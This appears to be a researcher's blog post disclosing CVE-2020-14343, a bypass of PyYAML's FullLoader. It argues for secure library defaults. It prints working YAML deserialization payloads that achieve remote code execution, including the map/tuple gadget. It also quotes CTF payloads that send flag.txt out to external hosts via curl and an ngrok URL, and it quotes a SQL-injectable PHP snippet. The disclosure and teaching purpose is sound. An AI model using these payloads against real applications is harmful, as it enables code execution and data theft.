PyYAML is a python library that allows users to serialize and deserialize data to the commonly used .yml format. It is consistently in the top 20 most downloaded python packages according to https://pypistats.org/top.

PyYAML was originally created with a questionable design decision that yaml.load() would load the entire YAML specification rather than only a safe subset of it. This allows an attacker to obtain arbitrary code execution when they can control the data passed into yaml.load(). This is because the YAML serialization format is complex, and PyYAML allows for serialization and deserialization of python objects and functions.

A function call can be serialized easily via the custom YAML tag !!python/object/apply. For example, in old versions of the library, load()ing the text below would execute the python code eval("RCE_HERE")

!!python/object/apply:eval [ "RCE_HERE" ]

PyYAML has always indicated in their docs that yaml.load() should not be used on untrusted input, and that the yaml.safe_load() function is provided for loading untrusted data instead. yaml.safe_load() works as expected – it does not deserialize any complex types, such as functions, modules, and classes.

So, what's the problem? safe_load() is safe, so developers can just use that, right?

The issue at hand is that yaml.load() is still the default method that developers would go to. One of the most important principles of software security is to have secure defaults.  

Secure defaults are critical because no matter what, it is inevitable that some developers will be lazy, no one wants to read the docs! This isn't entirely the fault of the developer – it is also the responsibility of the library to not behave in unexpected ways. In the case of PyYAML, this is amplified because most developers' mental model of YAML is that it is a simple data interchange format, exactly like JSON. In the same way that one wouldn't expect json.load() to lead to arbitrary code execution, one wouldn't assume that yaml.load() would.

Another problem is that in the PyYAML Documentation, the very first code snippet shown uses yaml.load(), not the secure option safe_load()

import yaml
document = """
  a: 1
  b:
    c: 3
    d: 4
"""
print yaml.dump(yaml.load(document))

For a developer looking to build an application in a hurry, this is the very first code sample they'd see, and would not even reach the section of documentation which explains that safe_load() should be used on untrusted input instead. In fact, none of the code examples in the docs demonstrate usage of yaml.safe_load(). In a developer's mind, code is often greater than prose. When writing documentation, we should do our best to ensure that secure code is demonstrated.

One of the most prevalent types of vulnerabilities is SQL injection, which has been known about since 1998 and sits at the top of the OWASP top 10. The reason it is so common even in new code to this day is because of old tutorials and bad documentation lying around on the internet.

Here's a snippet from a page-1 Google search result for "php mysql tutorial"

if(!empty($_POST["id"]))
{
$result = mysqli_query($dbhandle, "SELECT ID, Name, City FROM StudentMst where ID=".$_POST["id"] );
}

According to GitHub code search, there are over 762k files that use PyYAML. Of those, up to 529k files are currently using the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution.

220k call safe_load or specify SafeLoader.

Only 13k explicitly use unsafe_load or specify UnsafeLoader.


Issue #5 in the PyYAML repo was to make safe_load the default method, all the way back in 2013. It was eventually finally addressed in 2017 (4 years later!!) by PR #74, which was assigned CVE-2017-18342. Everyone loved the PR, and it was happily merged into the main codebase for PyYAML release 4.1.

So, everything ended up fantastic, right?

Unfortunately, not quite.

The YAML organization decided to revert the PR for release 4.2. In the 4.2 release notes, they explain why. Summary:

  • backwards compatibility concerns
  • not a fan of the names danger_load and danger_dump, as they can be used in "non-dangerous" ways.
  • broke parts of their build process, and they were in a rush to get a working release for Python 3.7

Quite frankly, other than the last point, these reasons are extremely suspect from a security standpoint. To address point 1, the vast majority of users are probably not making use of PyYAML's object serialization features. Most people use YAML because it is great for human-readable and editable configuration files. Furthermore, it is okay to break backwards-compatibility in favor of security.

As for point 2, the danger names are absolutely fine, as it makes people take a second to think about what their code is doing. Many popular libraries use similar naming conventions. In my opinion, the ReactJS docs explain their stance on their dangerouslySetInnerHTML method very nicely.

Improper use of the innerHTML can open you up to a cross-site scripting (XSS) attack. Sanitizing user input for display is notoriously error-prone, and failure to properly sanitize is one of the leading causes of web vulnerabilities on the internet.

Our design philosophy is that it should be "easy" to make things safe, and developers should explicitly state their intent when performing “unsafe” operations. The prop name dangerouslySetInnerHTML is intentionally chosen to be frightening, and the prop value (an object instead of a string) can be used to indicate sanitized data.

After fully understanding the security ramifications and properly sanitizing the data, create a new object containing only the key __html and your sanitized data as the value. Here is an example using the JSX syntax:

The PyYAML developers agreed that secure defaults are good, and in the 5.1 release, they attempted to address it. They attempted to do so by adding a new loader method FullLoader, which still allows serialization and deserialization of objects and references, but not function calls. According to them, this would avoid arbitrary code execution.

However, that doesn't really seem to be the case.


Technical details of exploit

The main complex tag types which PyYAML supports are as follows:

  • !!python/name:x - a reference to the variable named x
  • !!python/object/new:X [args] - a constructor call X(args)
  • !!python/module:x - a reference to the (loaded) module x
  • !!python/object/apply:x [args] - a function call x(args)

To reiterate, in latest versions of PyYAML (5.3.1 as of writing this), load() uses FullLoader, in which the !!python/object/apply tag is blocked.

So, the trivial exploit !!python/object/apply:eval [ "RCE_HERE" ] does not work.

We can't perform method calls, but we can still instantiate classes! So, if we can find a class constructor which allows us to execute code, or call a function of our choosing, we can still obtain RCE.

Fun fact, in Python3, map is actually a class.

So, we can easily evaluate a map(fn, x), where our fn can be eval.

!!python/object/new:map [ !!python/name:eval , [ "RCE_HERE" ] ]

The last step is that map() actually returns a generator, so we need to coerce it in order for it to actually evaluate.

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ "RCE_HERE" ]

This allows an attacker to obtain arbitrary code execution in the latest version of PyYAML via yaml.load().


I ended up featuring this vulnerability as part of a challenge for UIUCTF, a security learning competition that my college ran. You can read more about the challenge in this writeup.

Here are some other interesting payloads which participants found (see if you can figure out what they do)

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "\x5f\x5fimport\x5f\x5f('os')\x2esystem('curl -POST mil1\x2eml/jm9 -F [email protected]\x2etxt')"
- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "from urllib import request;print(getattr(request, 'urlopen')('http://34d89df89d21\\x2engrok\\x2eio/'+getattr(open('flag\\x2etxt'), 'read')()))"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec

Wrap Up

I have disclosed this issue to the PyYAML developers, and it was assigned CVE-2020-14343. After a bit of back-and-forth with the developers on Github, it seems I managed to convince them that load() should default to safe_load(). The current roadmap is for the library to update to this behavior in the 6.0 release.

Takeaways:

  • As a library developer, you are responsible for trying to protect your users (yes, even if they are too lazy to read your docs)
  • Stick to the principle of secure by default
  • Clearly demonstrate secure usage when writing documentation, and keep it at the top, where it will be seen first
    • Consider having important documentation in code snippets rather than in prose
  • Don't try to mitigate a vulnerability with a poorly thought-out blocklist